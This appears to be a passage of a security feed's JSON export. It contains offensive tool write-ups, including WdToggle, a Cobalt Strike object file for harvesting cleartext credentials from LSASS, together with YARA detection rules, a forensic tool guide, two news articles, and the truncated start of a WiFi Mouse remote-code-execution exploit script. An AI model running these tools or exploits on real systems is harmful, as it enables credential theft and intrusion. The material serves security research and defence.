\"(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))\" ascii wide nocase \n $s3 = \"msDS-AllowedToActOnBehalfOfOtherIdentity\" ascii wide nocase \n $s4 = \">--~~--> Args? <--~~--<\" ascii wide nocase \n \n condition: \n all of ($s*) \n } \n \n rule StandIn_PDB \n { \n meta: \n author = \"Ruben Boonen (@FuzzySec)\" \n description = \"Detect StandIn default PDB.\" \n \n strings: \n $s1 = \"\\\\Release\\\\StandIn.pdb\" ascii wide nocase \n \t \n condition: \n all of ($s*) \n }\n\n \n** SilktETW Microsoft-Windows-DotNETRuntime Yara Rule ** \n\n\nThe Yara rule below can be used to detect StandIn when execution happens from memory. To use this rule, the EDR solution will require access to the ` Microsoft-Windows-DotNETRuntime ` ETW data provider. For testing purposes, this rule can be directly evaluated using [ SilkETW ](<https://github.com/fireeye/SilkETW> \"SilkETW\" ) . It should be noted that this is a generic example rule, production alerting would required a more granular approach. \n \n \n rule Silk_StandIn_Generic \n { \n meta: \n author = \"Ruben Boonen (@FuzzySec)\" \n description = \"Generic Microsoft-Windows-DotNETRuntime detection for StandIn.\" \n \n strings: \n $s1 = \"\\\\r\\\\nFullyQualifiedAssemblyName=0;\\\\r\\\\nClrInstanceID=StandIn\" ascii wide nocase \n $s2 = \"MethodFlags=Jitted;\\\\r\\\\nMethodNamespace=StandIn.\" ascii wide nocase \n \n condition: \n any of them \n }\n\n \n\n\n** [ Download StandIn ](<https://github.com/FuzzySecurity/StandIn> \"Download StandIn\" ) **\n", "edition": 1, "modified": "2021-03-01T11:30:15", "published": "2021-03-01T11:30:15", "id": "KITPLOIT:6265405922368142658", "href": "http://www.kitploit.com/2021/03/standin-small-net3545-ad-post.html", "title": "StandIn - A Small .NET35/45 AD Post-Exploitation Toolkit", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-28T23:44:16", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-VDUSQhlaWUk/YDSYlbe1orI/AAAAAAAAVcw/wJgwsKPumsU5NZ3v0UlgAFyLJimv1NNBgCNcBGAsYHQ/s767/WdToggle_1_WdToggle.png>)\n\n \n\n\nA Proof of Concept [ Cobalt Strike ](<https://www.kitploit.com/search/label/Cobalt%20Strike> \"Cobalt Strike\" ) Beacon Object File which uses [ direct system calls ](<https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/> \"direct system calls\" ) to enable ** WDigest ** credential caching and circumvent ** Credential Guard ** (if enabled). \n\nAdditional guidance can be found in this blog post: [ https://outflank.nl/blog/?p=1592 ](<https://outflank.nl/blog/?p=1592> \"https://outflank.nl/blog/?p=1592\" )\n\n \n\n\n** Background ** \n\n\nThis PoC code is based on the following excellent blog posts: \n\n[ Exploring Mimikatz - Part 1 - WDigest ](<https://blog.xpnsec.com/exploring-mimikatz-part-1/> \"Exploring Mimikatz - Part 1 - WDigest\" )\n\n[ Bypassing Credential Guard ](<https://teamhydra.blog/2020/08/25/bypassing-credential-guard/> \"Bypassing Credential Guard\" )\n\nUtilizing direct systems calls via inline assembly in BOF code provides a more opsec safe way of interacting with the LSASS process. Using direct system calls avoids AV/EDR software intercepting user-mode API calls. \n\nVisual Studio (C++) does not support inline assembly for x64 processors. So in order to write a single Beacon Object File containing our compiled / assembled code code we must use the [ Mingw-w64 ](<https://mingw-w64.org> \"Mingw-w64\" ) (GCC for Windows) compiler. \n\n \n** What is this repository for? ** \n\n\n * Demonstrate the usage of direct systems calls using inline-assembly to provide a more opsec safe way of interacting with the LSASS process. \n * Enable ** WDigest ** credential caching by toggling the ` g_fParameter_UseLogonCredential ` global parameter to 1 within the LSASS process (wdigest.dll module). \n * Circumventing ** Credential Guard ** (if enabled) by toggling the ` g_IsCredGuardEnabled ` variable to 0 within the LSASS process (wdigest.dll module). \n * Execute this code within the Beacon process using a [ Beacon object file ](<https://www.cobaltstrike.com/help-beacon-object-files> \"Beacon object file\" ) . \n \n** How do I set this up? ** \n\n\nWe will not supply compiled binaries. You will have to do this yourself: \n\n * Clone this repository. \n\n * Make sure you have the Mingw-w64 compiler installed. On Mac OSX for example, we can use the ports collection to install Mingw-w64 ( ` sudo port install mingw-w64 ` ). \n\n * Run the ` make ` command to compile the Beacon object file. \n\n * Within a Cobaltstrike beacon context run the ` inline-execute ` command and provide the path to the object ` WdToggle.o ` file. \n\n * \n\n\n * Run the Cobaltstrike ` logonpasswords ` command (Mimikatz) and notice that clear text [ passwords ](<https://www.kitploit.com/search/label/Passwords> \"passwords\" ) are enabled again for new user logins or users who ** unlock ** their desktop session. \n\n[  ](<https://1.bp.blogspot.com/-S3N7dcv6Skg/YDSYsSVpvUI/AAAAAAAAVc0/SznQiTKQA9cCen2qIysM7BrfyIMyDpzAQCNcBGAsYHQ/s767/WdToggle_1_WdToggle.png>)\n\n \n\n\n** Limitations ** \n\n\n * This memory patch is not reboot persistent, so after a reboot you must rerun the code. \n * The memory offset to the ` wdigest!g_fParameter_UseLogonCredential ` and ` wdigest!g_IsCredGuardEnabled ` global variable could change between Windows versions and revisions. We provided some offsets for different builds, but these can change in future releases. You can add your own version offsets which can be found using the Windows debugger tools. \n \n \n C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64>cdb.exe -z C:\\Windows\\System32\\wdigest.dll \n \n 0:000>x wdigest!g_fParameter_UseLogonCredential \n 00000001`800361b4 wdigest!g_fParameter_UseLogonCredential = <no type information> \n 0:000> x wdigest!g_IsCredGuardEnabled \n 00000001`80035c08 wdigest!g_IsCredGuardEnabled = <no type information> \n 0:000> \n \n\n \n** Detection ** \n\n\nTo detect credential theft through LSASS memory access, we could use a tool like [ Sysmon ](<https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon> \"Sysmon\" ) . Sysmon can be configured to log processes opening a handle to the lsass.exe process. With this configuration applied, we can gather telemetry for suspicious processes accessing the LSASS process and help detecting possible credential dumping activity. Of course, there are more options to detect credential theft, for example using an advanced detection platform like [ Windows Defender ](<https://www.kitploit.com/search/label/Windows%20Defender> \"Windows Defender\" ) ATP. But if you don\u2019t have the budget and luxury of using these platforms, then Sysmon is that free tool that can help to fill up the gap. \n\n \n** Credits ** \n\n\n * The assembly code used within this tool is based on the assembly output from the [ SysWhispers ](<https://github.com/jthuraisamy/SysWhispers> \"SysWhispers\" ) tool from [ @Jackson_T ](<https://twitter.com/Jackson_T> \"@Jackson_T\" ) . \n * Adam Chester [ @_xpn_ ](<https://twitter.com/_xpn_> \"@_xpn_\" )\n * N4kedTurtle from [ Team Hydra ](<https://teamhydra.blog> \"Team Hydra\" )\n \n \n\n\n** [ Download WdToggle ](<https://github.com/outflanknl/WdToggle> \"Download WdToggle\" ) **\n", "edition": 1, "modified": "2021-02-28T20:30:05", "published": "2021-02-28T20:30:05", "id": "KITPLOIT:7143868336892332212", "href": "http://www.kitploit.com/2021/02/wdtoggle-beacon-object-file-bof-for.html", "title": "WdToggle - A Beacon Object File (BOF) For Cobalt Strike Which Uses Direct System Calls To Enable WDigest Credential Caching", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-28T15:38:09", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/--3Admoa99yk/YDSYFn648AI/AAAAAAAAVco/yY0lBQ_BVJwYn6lXPyPAF1rVDSwLTPqLgCNcBGAsYHQ/s300/gargamel_1_logo.png>)\n\n \n\n\nA Forensic Evidence Acquirer \n\n \n\n\n** Compile ** \n\n\nAssuming you have Rust 1.41+ installed. Open terminal in the project directory and to compile a release build type \n \n \n cargo build --release\n\nDebug build can be compiled using \n \n \n cargo build\n\nCompiled executable is located at ` target/release/gargamel.exe ` or ` target/debug/gargamel.exe ` , respectively. \n\n \n** Set log level ** \n\n\nIf you wish to change the logging level: \n\n * Open ` src/main.rs `\n * On lines 42 and 43 change ` LevelFilter::Info ` to (for example) ` LevelFilter::Trace ` for more detailed logging. \n * Beware that the ` LevelFilter::Trace ` will log everything including passwords. \n \n** User guide ** \n\n\nRight now, this app works only on Windows and the target computer must use Windows or Linux. \n\nMake sure to have the following programs in the same directory as Gargamel. \n\n * ` psexec ` , [ download ](<https://docs.microsoft.com/en-us/sysinternals/downloads/psexec> \"download\" )\n * ` paexec ` , an open source alternative to PsExec, [ download ](<https://www.poweradmin.com/paexec/> \"download\" )\n * ` winpmem ` , an open source memory image tool, [ download ](<https://github.com/Velocidex/c-aff4/releases> \"download\" ) . \n * Download the newest executable and rename it to _ winpmem.exe _\n * ` plink ` and ` pscp ` , an open source CLI SSH/SCP clients, [ download ](<https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html> \"download\" )\n * ` SharpRDP ` , an open source command executor using RDP, [ download ](<https://github.com/vildibald/SharpRDP/releases/tag/v1.0.0> \"download\" )\n * ` WMImplant ` , as open source [ PowerShell ](<https://www.kitploit.com/search/label/PowerShell> \"PowerShell\" ) WMI command executor, [ download ](<https://github.com/vildibald/WMImplant> \"download\" )\n * ` 7za.exe ` , a standalone console version of 7zip archiver, [ download ](<https://www.7-zip.org/download.html> \"download\" )\n\nNote: We need both the ` psexec ` and ` paexec ` . Although both applications are supposed to be functionally equivalent they actually both have different behavior under some circumstances. \n\n \n** Unleashing the power of Gargamel ** \n\n\nGargamel needs to be launched from an elevated terminal to be fully functional. Currently it does not support the UAC dialog nor any kind of notification when running with limited privileges. When running with limited user privileges, then some [ operations ](<https://www.kitploit.com/search/label/Operations> \"operations\" ) like target memory dumping will not work. \n\n \n** Basic example ** \n\n\nAssume you want to connect to a computer with the following parameters: \n\n * address ` 192.168.42.47 `\n * username ` Jano `\n * password ` nbusr123 `\n\nThe following command will acquire firewall state, network state, logged users, running processes, active network connections, registry, system &amp; application event logs using PsExec method. Evidence will be stored in the ` testResults ` directory relative to the location of Gargamel. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults\n\nGargamel will ask you for password of the remote user, in our example the password is ` nbusr123 ` . Note that password will be hidden when typing. \n\nIt is also possible to specify the password directly as program argument. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -p nbusr123 -o testResults\n\n \n** Domain example ** \n\n\nAssume you want to connect to a computer in a domain with the following parameters: \n\n * domain ` WORKSPACE `\n * computer name ` JanovPC `\n * username ` Jano `\n * password ` nbusr123 `\n\nThe following command will acquire firewall state, network state, logged users, running processes, active network connections, registry, system &amp; application event logs using PsExec method. \n \n \n gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -o testResults\n\nOr to skip password prompting specify the password directly. \n \n \n gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -p nbusr123 -o testResults\n\n \n** Other connection methods ** \n\n\nPsExec is one of the 5 supported connection methods. You can replace the ` --psexec ` with the following options: \n\n * ` --psexec `\n * ` --psrem ` , if PowerShell remoting is configured on target machine. \n * ` --rdp ` , if RDP is enabled on target machine. \n * ` --wmi ` . \n * ` --ssh ` , if target machine uses Linux. \n\nIt is possible to use several methods at once. For example to use both PsExec and RDP one can use the following command. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec --rdp -o testResults\n\nThere is also a special switch ` --all ` that is equal to specifying ` --psexec --rdp --psrem --wmi ` . \n\nNote: Launch parameters are order-agnostic, i.e. it does not matter in which order the parameters are specified. \n\n \n** Acquire memory ** \n\n\nTo acquire also memory dump, then simply add the ` -m ` flag to the program parameters, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -m\n\nIf you wish to acquire ONLY the memory dump without other evidence then use the following command. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -m --no-events-search --no-evidence-search --no-registry-search \n\nThis functionality is available only for Windows targets. \n\n \n** Run custom commands ** \n\n\nGargamel may run custom Windows CMD or Linux shell commands on remote machine. \n\nFirst create a file ` custom-commands.txt ` with the following content. \n \n \n # Will be run using any method \n ipconfig \n # Will run only when launching with at least one of --all, --psexec, --wmi methods \n :psexec:wmi ipconfig -all\n\nResults of the above commands will be stored in the directory specified by ` -o ` option. \n\nTo run the above commands written in ` custom-commands.txt ` use the ` -e ` switch, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -e custom-commands.txt \n\n \n** Download custom files ** \n\n\nGargamel is able to download remote files. \n\nFirst create a file ` custom-files.txt ` with the following content. \n \n \n C:\\Users\\Public\\sss* \n C:\\Users\\Jano\\danove.pdf \n # This line and the next one will be ignored \n # C:\\Users\\Jano\\somBajecny.pptx \n\n \n** Note: Wildcards * and ? are supported but currently only in filenames, not parent directories, i.e. C:\\Users\\J*\\danove.pdf will most likely not work. ** \n\n\nResults of the above commands will be stored in the directory specified by ` -o ` option. \n\nTo run the above commands written in ` custom-files.txt ` use the ` -s ` switch, i.e. \n \n \n gargamel.exe -c 192.168.42.47 -u Jano --psexec -o testResults -s custom-files.txt \n\n \n** All options ** \n\n\nAll supported switches are described below. \n \n \n USAGE: \n gargamel.exe [FLAGS] [OPTIONS] --user <user> \n \n FLAGS: \n -a, --all Acquire evidence from Windows machine using all supported methods (PsExec, PsRemote, \n WMI, RDP). \n --no-events-search Disables Windows event logs acquisition. \n --no-evidence-search Disables acquisition of evidence that can be usually downloaded quickly (like ipconfig, \n firewall status etc..) \n --no-registry-search Disables target registry acquisition. \n -h, --help Prints help information \n -m, --mem-image Optional: Memory dump of a target Windows machine. \n --local Acquire evidence from local machine. \n --nla Optional: Use network level authentication when using RDP. (Windows targets only) \n --no-7z Optional: Disable 7zip c ompression for registry & memory images.This will significantly \n decrease the running time, but WMI and RDP connections will probably not work properly. \n (Windows targets only) \n --psexec Acquire evidence from Windows machine using PsExec. Requires both PsExec64.exe and \n paexec.exe in the current directory or in the path. \n --psrem Acquire evidence from Windows machine using PowerShell. Requires both PsExec64.exe and \n paexec.exe in the current directory or in the path. \n --rdp Acquire evidence from Windows machine using RDP. Requires SharpRDP.exe in the current \n directory or in the path. \n --ssh Acquire evidence from Linux machine using SSH. Requires both plink.exe and pscp.exe in \n the current directory or in the path. \n -V, --version Prints version information \n --wmi Acquire evidence from Windows machine using WMI. Requires WMImplant.ps1 in the current \n directory or in the path and PowerShell 3.0+ on the host machine.Note: It is necessary \n to disable [Windows Defender](<https://www.kitploit.com/search/label/Windows%20Defender> \"Windows Defender\" ) real-time [protection](<https://www.kitploit.com/search/label/Protection> \"protection\" ) (other AVs not tested). \n \n OPTIONS: \n -c, --computer <computer> Remote computer address/name. [default: 127.0.0.1] \n -u, --user <user> Remote user name \n -d, --domain <domain> Optional: Remote Windows domain \n -o, --output <local-store-directory> \n Name of local directory to store the evidence [default: evidence-output] \n \n -p, --password <password> \n Optional: Remote user password. Skipping this option will prompt a possibility to put a password in hidden \n way.To specify an empty password use `-p \"\"` \n \n --redownload <re-download> \n Optional: Download and DELETE specified file from target computer. Use this in case of previous failed \n partially completed operation. For just downloading a file (without deleting it) please use a `search` \n switch. If you specify a 7zip chunk (.7z.[chunk-number], e.g. .7z.004), then it will also automatically try to \n download subsequent chunks.Use also with --psexec --psrem, --rdp, --wmi, --all \n \n -r, --remote-storage <remote-store-directory> \n Name of [remote directory](<https://www.kitploit.com/ search/label/Remote%20Directory> \"remote directory\" ) to be used as a temporary storage. (Windows targets only) [default: \n C:\\Users\\Public] \n \n -e, --commands <custom-command-path> Optional: File with custom commands to execute on remote computer \n \n -s, --search <search-files-path> \n Optional: File with files names to be searched on remote computer. File names supports also `*` and `?` \n wildcards on file names (but not yet parent directories). \n \n --key <ssh-key> Optional: Name/path of SSH private key file. (Linux target only) \n \n --timeout <timeout> \n Optional: Timeout in seconds for long running operations.This option is a workaround for a bug in \n WMImplant.ps1 amd SharpRDP.exe where finishing of a long running operation cannot sometimes properly close \n the connection leaving the Gargamel in seemingly frozen state or executing the next operation with the \n previous one unfinished on target site.Increasing this timeout may solve issues when acquiring registry or \n memory image from target machine. [default: 300] \n \n\n \n** Known issues ** \n\n\n * WMI cannot write its output to file with symbol ` _ ` in its path/name. \n \n \n\n\n** [ Download Gargamel ](<https://github.com/Lifars/gargamel> \"Download Gargamel\" ) **\n", "edition": 1, "modified": "2021-02-28T11:30:02", "published": "2021-02-28T11:30:02", "id": "KITPLOIT:6715981344528147603", "href": "http://www.kitploit.com/2021/02/gargamel-forensic-evidence-acquirer.html", "title": "Gargamel - A Forensic Evidence Acquirer", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2021-03-01T10:27:36", "bulletinFamily": "info", "cvelist": [], "description": "[](<https://thehackernews.com/images/-29dFxgb0Oz0/YDOUrBP2w5I/AAAAAAAA3oE/IyFJFp77vyIQMNqJ3kX0Npn31xUmQYtXwCLcBGAsYHQ/s0/hacked.jpg>)\n\nLet's first take a look back at 2020!\n\nAdding to the list of difficulties that surfaced last year, 2020 was also grim for personal data protection, as it has marked a new record number of leaked credentials and PI data.\n\nA whopping 20 billion records were stolen in a single year, increasing 66% from 12 billion in 2019. Incredibly, this is a 9x increase from the comparatively \"small\" amount of 2.3 billion records stolen in 2018.\n\nThis trend seems to fit an exponential curve; even worse, we are yet to see the fallouts from the end of the year \"Solorigate\" campaign, which has the potential to marginalize even these numbers by the end of 2021.\n\nFound among the leaked data are usernames, passwords, credit card numbers, bank account details, healthcare information, and other personal data. Malicious actors utilize these treasure troves of information for fraud and further attacks.\n\n[](<https://thehackernews.com/images/-15RJwply-uw/YCKqA5lbgSI/AAAAAAAAA10/nIYgSX5fwKokER6MjBazjFFXdHtJAKAZgCLcBGAsYHQ/s0/hacker-2.jpg>)\n\nIn just the first quarter of 2020, the Dutch government managed to lose a hard drive containing confidential citizen data. Meanwhile, the UK government exposed 28 million children's data to betting companies, and Microsoft exposed 250 million records of customer support\u2014including customers' geographic data, IP addresses, and other private information.\n\nBy April, Zoom had lost 500,000 passwords at the start of the global remote working period. In June of Q2, Oracle had also leaked billions of web tracking data by storing data on an unsecured server.\n\nQ3 kicked off with Joe Biden's campaign app exposing millions of users' sensitive voter data. This was followed by 300,000 Spotify users falling victim to account takeover attempts after their credentials were made public.\n\nThe year ended with Solorigate: an incident with a lasting impact that has yet to be fully seen. Ultimately, 2020 closed with a total of 1,114 incidents, with several governments and well-known brands\u2014such as Estee Lauder, Marriott, Nintendo, and GoDaddy\u2014involved in large-scale breaches.\n\n**Why are companies and organizations still failing?**\n\n[This trend of data breaches](<https://scirge.com/blog/2020/09/22/shadow-it-what-it-is-and-why-it-is-an-alarming-security-concern-for-every-organization/>) is quite disappointing when compared to the staggering $120 Billion in global IT security spending; according to Gartner, this number has grown each year rapidly.\n\nThe only possible solution to this inconsistency rests in user awareness and the possibility that existing technologies are missing something substantial to turn the tide on these trends.\n\nThe most common cause behind data breaches is the leak of some authentication measure\u2014this may be a username, password, token, API-key, or a negligent password-less server or application.\n\nUsers are registering to third-party websites and services with corporate email addresses and credentials every day. In tandem, they create massive blind spots in visibility and a field of Shadow IT that no audit or security tool has been able to mitigate thus far. Each employee has around 200 accounts\u2014for every 1,000 employees, that is 200,000 potentially unknown or weak passwords, many of which may be corporate related.\n\nOnce these third parties get compromised, the credentials obtained might be reused to gain unauthorized access to other corporate services, such as email accounts or VPN servers, using attack techniques like credential stuffing or password spraying.\n\nThis was exactly the case with British Airways, which received a record GDPR fine of \u00a320 million after 400,000 passengers' data was breached, initiated through a VPN gateway accessed by a compromised account.\n\nMost large organizations use data leak prevention technologies yet fail to protect against password leaks and account takeovers. This demonstrates an apparent need for a new approach\u2014a hybrid of technological controls and immediate user awareness improvement that implements a fresh perspective on account protection.\n\n**Shedding Light on Shadow IT**\n\n[Scirge was developed](<https://scirge.com/5-steps-to-conquer-shadow-it>) with a simple and clear focus on solving an overlooked aspect of existing IT security mechanisms: discovering and protecting accounts created by employees in the cloud. This includes the capability to monitor all new registrations, as well as viewing logins with existing credentials to websites and web applications.\n\nFurthermore, it involves centrally managed strength and complexity checks for all passwords while also warning users for proper credential management.\n\nPolicy-based controls may be created to block the usage of certain email addresses or websites. Scirge will immediately provide users with awareness messages when they are misusing corporate credentials or disregarding password complexity requirements.\n\n[](<https://thehackernews.com/images/-TBeGQNTg4rs/YDKcSYadANI/AAAAAAAA3n0/zNfOyl_pemQgXw_6w8uaJXFdEsxJSQAoQCLcBGAsYHQ/s0/software.jpg>)\n\nCentral intelligence helps unveil reused passwords and compromised accounts via comparing every company-related account to leak databases and locally-used (Active Directory) accounts. Scirge can illuminate organizations' otherwise hidden cloud footprint while simultaneously empowering users with knowledge about password hygiene, corporate policies, and unwanted behavior when using corporate accounts.\n\nScirge accomplishes each of these goals with a clean, browser-based approach. It eliminates the need to control or view network traffic, decrypt SSL, or burden clients with full-blown agents\u2014a common source of performance degradation and compatibility issues with other security tools.\n\nUtilizing its unique features, Scirge creates visibility for all employee-created accounts and reveals password hygiene issues. Inventory for all users\u2014including departing workers\u2014is readily available, unveiling unwanted account sharing between users and potential insider threats of misusing identities when accessing online resources.\n\nThe dashboard also shows IT management what cloud apps are most used without consent, helping the company comply with regulations via collecting privacy policies and T&amp;Cs of all services. \n\nLearn more about account protection and Shadow IT awareness [here](<https://scirge.com/5-steps-to-conquer-shadow-it>) or register to one of our [webinars](<https://webinars.scirge.com/>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-03-01T10:18:42", "published": "2021-03-01T10:18:00", "id": "THN:90EAEC6C570853D90420A05EB742D51C", "href": "https://thehackernews.com/2021/03/why-do-companies-fail-to-stop-breaches.html", "type": "thn", "title": "Why do companies fail to stop breaches despite soaring IT security investment?", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-01T10:27:36", "bulletinFamily": "info", "cvelist": [], "description": "[](<https://thehackernews.com/images/-Fy8EqDtTwHU/YDy81MlV1OI/AAAAAAAAB6I/zfuzIcUHpMYaopT8MYeGwflwMgiTIh_bACLcBGAsYHQ/s0/india-powergrid-cyberattacl.jpg>)\n\nAmid heightened [border tensions](<https://en.wikipedia.org/wiki/2020%E2%80%932021_China%E2%80%93India_skirmishes>) between India and China, cybersecurity researchers have revealed a concerted campaign against India's critical infrastructure, including the nation's power grid, from Chinese state-sponsored groups.\n\nThe attacks, which coincided with the standoff between the two nations in May 2020, targeted a total of 12 organizations, 10 of which are in the power generation and transmission sector.\n\n\"10 distinct Indian power sector organizations, including four of the five Regional Load Despatch Centres (RLDC) responsible for operation of the power grid through balancing electricity supply and demand, have been identified as targets in a concerted campaign against India's critical infrastructure,\" Recorded Future [said](<https://www.recordedfuture.com/redecho-targeting-indian-power-sector/>) in a report published yesterday. \"Other targets identified included 2 Indian seaports.\"\n\nChief among the victims include a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based Power System Operation Corporation Limited.\n\nPinning the intrusions on a new group dubbed \"RedEcho,\" investigators from the cybersecurity firm's Insikt Group said the malware deployed by the threat actor shares strong infrastructure and victimology overlaps with other Chinese groups APT41 (aka Barium, Winnti, or Wicked Panda) and Tonto Team.\n\nBorder conflicts have flared up since last year after deadly clashes between Indian and Chinese soldiers in Ladakh's Galwan Valley. While 20 Indian soldiers were killed in the clashes, China [formally identified four casualties](<https://www.globaltimes.cn/page/202102/1215947.shtml>) on its side for the first time on February 19.\n\n[](<https://thehackernews.com/images/-2TuQOEnLYdE/YDy6YemLfuI/AAAAAAAAB6A/X7zGPxsQ_rM9aGz2sYyDrEd9793fX9YEwCLcBGAsYHQ/s0/INDIA.jpg>)\n\nIn the intervening months, the Indian government has banned over 200 Chinese apps for allegedly engaging in activities that posed threats to \"national security and defence of India, which ultimately impinges upon the sovereignty and integrity of India.\"\n\nNoting that the standoff between the two countries was accompanied by increased espionage activity on both sides, Recorded Future said the attacks from China involved the use of infrastructure it tracks as AXIOMATICASYMPTOTE, which encompasses a modular Windows backdoor called [ShadowPad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad>) that has been previously attributed to APT41 and subsequently shared between other Chinese state-backed actors.\n\nAdditionally, the report also raises questions about a possible connection between the skirmishes and a power blackout that crippled Mumbai last October.\n\nWhile [initial probe](<https://www.indiatoday.in/india/story/mumbai-power-outage-malware-attack-1742538-2020-11-20>) conducted by the cyber department of the western Indian state of Maharashtra traced the attack to a piece of unspecified malware identified at a Padgha-based State Load Despatch Centre, the researchers said, \"the alleged link between the outage and the discovery of the unspecified malware variant remains unsubstantiated.\"\n\n\"However, this disclosure provides additional evidence suggesting the coordinated targeting of Indian Load Despatch Centres,\" they added.\n\nInterestingly, these cyberattacks were described as originating from Chengdu, which is also the base for a network technology firm called Chengdu 404 Network Technology Company that operated as a front for a [decade-long hacking spree](<https://thehackernews.com/2020/09/apt41-hackers-wanted-by-fbi.html>) targeting more than 100 high-tech and online gaming companies.\n\n[](<https://thehackernews.com/images/-K78umNmJQMM/YDy6VJSDaFI/AAAAAAAAB58/WI3oBecq5qsNqFRJpp-pq97iP7ofk4l_ACLcBGAsYHQ/s0/india-china-hacking.jpg>)\n\nBut it's not just China. In the weeks leading to the clashes in May, a state-sponsored group called [Sidewinder](<https://cybersecurity.att.com/blogs/labs-research/a-global-perspective-of-the-sidewinder-apt>) \u2014 which operates in support of Indian political interests \u2014 is said to have singled out Chinese military and government entities in a [spear-phishing attack](<https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html>) using lures related to COVID-19 or the territorial disputes between Nepal, Pakistan, India, and China.\n\nThe modus operandi aside, the finding is yet another reminder of why critical infrastructure continues to be a lucrative target for an adversary looking to cut off access to essential services used by millions of people.\n\n\"The intrusions overlap with previous Indian energy sector targeting by Chinese threat activity groups in 2020 that also used AXIOMATICASYMPTOTE infrastructure,\" the researchers concluded. \"Therefore, the focus in targeting India's electricity system possibly indicates a sustained strategic intent to access India's energy infrastructure.\"\n\nWe have reached out to India's Computer Emergency Response Team (CERT-IN), and we will update the story if we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-03-01T10:11:36", "published": "2021-03-01T10:11:00", "id": "THN:E0EB3D12B92F39F7FC02940AAB171B21", "href": "https://thehackernews.com/2021/03/chinese-hackers-targeted-indias-power.html", "type": "thn", "title": "Chinese Hackers Targeted India's Power Grid Amid Geopolitical Tensions", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-03-01T10:39:58", "description": "", "published": "2021-03-01T00:00:00", "type": "exploitdb", "title": "WiFi Mouse 1.7.8.5 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-01T00:00:00", "id": "EDB-ID:49601", "href": "https://www.exploit-db.com/exploits/49601", "sourceData": "# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution\r\n# Date: 25-02-2021\r\n# Author: H4rk3nz0\r\n# Vendor Homepage: http://necta.us/\r\n# Software Link: http://wifimouse.necta.us/#download\r\n# Version: 1.7.8.5\r\n# Tested on: Windows Enterprise Build 17763\r\n\r\n# Desktop Server software used by mobile app has PIN option which does not to prevent command input.\r\n# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.\r\n\r\n#!/usr/bin/python\r\n\r\nfrom socket import socket, AF_INET, SOCK_STREAM\r\nfrom time import sleep\r\nimport sys\r\nimport string\r\n\r\ntarget = socket(AF_INET, SOCK_STREAM)\r\nport = 1978\r\n\r\ntry:\r\n\trhost = sys.argv[1]\r\n\tlhost = sys.argv[2]\r\n\tpayload = sys.argv[3]\r\nexcept:\r\n\tprint(\"USAGE: python \" + sys.argv[0]+ \" <target-ip> <local-http-server-ip> <payload-name>\")\r\n\texit()\r\n\r\n\r\ncharacters={\r\n\t\"A\":\"41\",\"B\":\"42\",\"C\":\"43\",\"D\":\"44\",\"E\":\"45\",\"F\":\"46\",\"G\":\"47\",\"H\":\"48\",\"I\":\"49\",\"J\":\"4a\",\"K\":\"4b\",\"L\":\"4c\",\"M\":\"4d\",\"N\":\"4e\",\r\n\t\"O\":\"4f\",\"P\":\"50\",\"Q\":\"51\",\"R\":\"52\",\"S\":\"53\",\"T\":\"54\",\"U\":\"55\",\"V\":\"56\",\"W\":\"57\",\"X\":\"58\",\"Y\":\"59\",\"Z\":\"5a\",\r\n\t\"a\":\"61\",\"b\":\"62\",\"c\":\"63\",\"d\":\"64\",\"e\":\"65\",\"f\":\"66\",\"g\":\"67\",\"h\":\"68\",\"i\":\"69\",\"j\":\"6a\",\"k\":\"6b\",\"l\":\"6c\",\"m\":\"6d\",\"n\":\"6e\",\r\n\t\"o\":\"6f\",\"p\":\"70\",\"q\":\"71\",\"r\":\"72\",\"s\":\"73\",\"t\":\"74\",\"u\":\"75\",\"v\":\"76\",\"w\":\"77\",\"x\":\"78\",\"y\":\"79\",\"z\":\"7a\",\r\n\t\"1\":\"31\",\"2\":\"32\",\"3\":\"33\",\"4\":\"34\",\"5\":\"35\",\"6\":\"36\",\"7\":\"37\",\"8\":\"38\",\"9\":\"39\",\"0\":\"30\",\r\n\t\" 